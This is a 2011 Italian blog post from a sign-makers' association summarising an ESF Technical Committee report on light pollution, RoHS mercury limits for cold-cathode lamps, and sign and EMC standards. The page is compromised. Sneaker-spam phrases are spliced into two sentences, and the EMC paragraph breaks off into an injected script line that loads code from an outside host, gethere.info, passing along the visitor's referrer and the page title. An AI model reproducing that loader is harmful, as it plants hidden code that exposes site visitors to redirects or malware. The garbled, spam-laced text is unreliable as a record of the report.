Le attività del Comitato Tecnico ESF. Sintesi della relazione di Fausto Martin (co-presidente del CT ESF) all’Assemblea Nazionale di Ischia.

di Fausto Martin - 02 luglio 2011
Classificato in: CIT, ESF (Federazione Europea), Incontri, Mondo AIFIL, Vita AIFIL | Tag: , ,

Fausto Martin ha informato i Soci AIFIL riuniti in assemblea ad Ischia sulle politiche in seno al Comitato Tecnico ESF, di cui Martin è co-presidente insieme a Mike Hall. Di seguito, in estrema sintesi, gli argomenti principali di cui si sta occupando il CT ESF.

Inquinamento luminoso.

Il Comitato Tecnico della Federazione air jordan 14 Europea ha partecipato a due riunioni dell’Associazione Internazionale di Cielobuio (Irlanda del Nord nel 2009 ed Ungheria nel 2010), ciò ha permesso di presentare i vari tipi di insegne e di spiegare le difficoltà della misurazione della luce immessa nell’ambiente. Inoltre ha consentito di instaurare ottimi rapporti con l’organizzazione ecologica a livello internazionale. Una linea politica condivisa anche da AIFIL e che ha condotto all’organizzazione del seminario di Ischia.

Le lampade a catodo freddo e la nuova Direttiva RoHS

La direttiva Rohs pone il limite, a partire dal 1 gennaio 2012, di soli 13 mg di mercurio per ciascuna lampada a catodo freddo, un grave problema per tutto il settore in quanto per farne funzionare ciascuna lampada servono come minimo 100 mg.

Premesso che qualche produttore del Regno Unito ha contattato autonomamente e di propria iniziativa alcuni membri del Parlamento Europeo ricevendo risposte negative in merito a qualsiasi revisione della direttiva, la Federazione Europea non si da per vinta e sta cercando di intervenire presso la Commissione Europea tramite il Presidente Luc Steegmans. Dopo i primi contatti, pur mancando ogni certezza, pare vi siano possibilità di modificare la norma. La risposta dovrebbe giungere entro un paio di settimane.

Qualora la normativa non venisse modificata non si potranno più costruire ed installare lampade a catodo freddo (neon) a meno di modificare tecnologie e tecniche, ma probabilmente servirebbero anni.

Norma insegne sotto ai 1000 volt

È in discussione una norma per le insegne sotto i mille volt (che interessa sia lampade a bassa tensione che LED). La norma sarà divisa in due sezioni: installazione e prodotto.

Si invitano le associazioni nazionali a prendere parte ai gruppi di lavoro presso il CEI per collaborare ad una buona riuscita del progetto.

Sito ESF

Nel sito della Federazione ci sarà una lista di tutte le pubblicazioni delle varie Associazioni per poter implementare gli scambi di esperienze. Altri strumenti utili agli operatori del settore (Dichiarazione di conformità, modalità di bombardamento, pressione del gas, classificazione energetica dei ballast, ecc.) sono già accessibili mediante password, nella sezione relativa al Gruppo di lavoro tecnico.

Norma Interruttori (Interpompier)

La norma di prodotto è stata air jordan 1 femmes approvata; non è obbligatoria in sede di installazione ma serve solo ai fabbricanti per la realizzazione di prodotti conformi; ad oggi l’Interpompier è obbligatorio solo in alcuni Paesi (Francia, Inghilterra, Belgio, ecc.).

Nuova Norma EMC (F 533 CDV)

La norma è molto corposa e complicata, su cui si possono ancora fare commenti a livello CEI. Mike Hall ha messo a punto uno strumento semplice ed economico per misurare la s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed